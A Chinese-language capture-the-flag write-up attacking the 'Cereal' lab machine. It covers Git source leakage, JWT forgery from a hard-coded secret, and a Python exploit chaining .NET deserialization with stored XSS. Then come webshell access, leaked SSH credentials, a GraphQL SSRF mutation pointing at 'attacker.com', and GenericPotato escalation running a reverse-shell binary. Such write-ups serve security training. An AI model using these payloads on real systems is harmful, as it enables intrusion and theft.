Cereal靶机渗透测试报告

信息收集

初始扫描

• IP地址: 10.10.10.217
• 开放端口:
  • 22/tcp: OpenSSH for Windows 7.7
  • 80/tcp: Microsoft IIS httpd 10.0 (重定向到HTTPS)
  • 443/tcp: Microsoft IIS httpd 10.0 (SSL证书显示域名cereal.htb和source.cereal.htb)

子域名发现

• 将以下条目添加到/etc/hosts:

  10.10.10.217 cereal.htb source.cereal.htb
  

Git源代码泄露利用

GitDumper工具使用

./gitdumper.sh http://source.cereal.htb/.git/ RES/

Git历史分析

git log --oneline --graph --decorate --all

发现多个提交记录，其中包含安全修复(7bd9533 Security fixes)和最新更改(34b6823 Some changes)

JWT认证绕过

漏洞分析

• 在Services/UserService.cs中发现硬编码的JWT密钥:

  var key = Encoding.ASCII.GetBytes("secretlhfIH&FY*#oysuflkhskjfhefesf");
  

JWT令牌生成

使用Python生成管理员令牌:

import jwt
from datetime import datetime, timedelta

payload = {
    "N": "1",
    "exp": datetime.utcnow() + timedelta(days=7)
}
secret = 'secretlhfIH&FY*#oysuflkhskjfhefesf'

token = jwt.encode(payload, secret, algorithm="HS256")
if isinstance(token, bytes):
    token = token.decode()

print("currentUser={\"token\":\"" + token+"\"}")

.NET反序列化漏洞利用

漏洞点

• DownloadHelper.cs类存在不安全反序列化，可导致任意文件下载
• 关键代码:

  wc.DownloadFile(_URL, ReplaceLastOccurrence(_FilePath,"\\", "\\21098374243-"));
  

利用脚本

#!/usr/bin/env python3
import jwt
import requests
import sys
from datetime import datetime, timedelta
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# 生成JWT令牌
token = jwt.encode({'name': "1", "exp": datetime.utcnow() + timedelta(days=7)}, 'secretlhfIH&FY*#oysuflkhskjfhefesf', algorithm="HS256")
headers = {'Authorization': f'Bearer {token}', 'Content-Type': 'application/json'}

# 发送反序列化payload
serial_payload = {"json": "{'$type':'Cereal.DownloadHelper, Cereal','URL':'" + url + "','FilePath': 'C:\\\\inetpub\\\\source\\\\uploads\\\\" + saveas + "'}"} 
resp = requests.post(f'https://{target}/requests', json=serial_payload, headers=headers, verify=False)
serial_id = resp.json()['id']

# 发送XSS payload触发管理员访问
xss_payload = {"json":"{\"title\":\"[XSS](javascript: document.write%28%22<script>var xhr = new XMLHttpRequest;xhr.open%28'GET', 'https://"+ target + "/requests/" + str(serial_id)+"', true%29;xhr.setRequestHeader%28'Authorization','Bearer "+token+"'%29;xhr.send%28null%29</script>%22%29)\",\"flavor\":\"pizza\",\"color\":\"#FFF\",\"description\":\"test\"}"}
requests.post(f'https://{target}/requests', json=xss_payload, headers=headers, verify=False)

权限提升

初始访问

• 通过上传的Webshell获取用户sonny的凭据:

  1|sonny|mutual.madden.manner38974|
  

• 使用SSH登录:

  ssh sonny@10.10.10.217
  

SeImpersonatePrivilege提权

1. 检查当前用户权限:

   whoami /priv
   

   确认启用了SeImpersonatePrivilege

2. 发现本地GraphQL服务运行在8080端口，且以SYSTEM权限运行

3. 使用Chameleon工具进行端口转发:

   ssh -L 10000:127.0.0.1:8080 sonny@10.10.10.217
   

4. 分析GraphQL API:

   curl -d '{ "query": "{__schema{types{name,fields{name}}}}" }' -X POST http://127.0.0.1:10000/api/graphql -H 'Content-Type: application/json'
   

5. 发现危险mutation操作:

   mutation {
     updatePlant(plantId:1, version: 223.0, sourceURL: "http://attacker.com")
   }
   

6. 使用GenericPotato进行提权:

   .\GenericPotato.exe -p "C:\programdata\reverse_10.10.16.14_443.exe" -e HTTP
   

7. 触发漏洞:

   curl -d '{ "query": "mutation{updatePlant(plantId:1, version: 223.0, sourceURL: \"http://localhost:8888\")}" }' -X POST http://127.0.0.1:10000/api/graphql -H 'Content-Type: application/json'
   

获取最终凭证

• User.txt: 00a4c544c44f9af49ae0141a845cdec5
• Root.txt: c1bb05cabcdb5cc6a67dd719c1dc67d6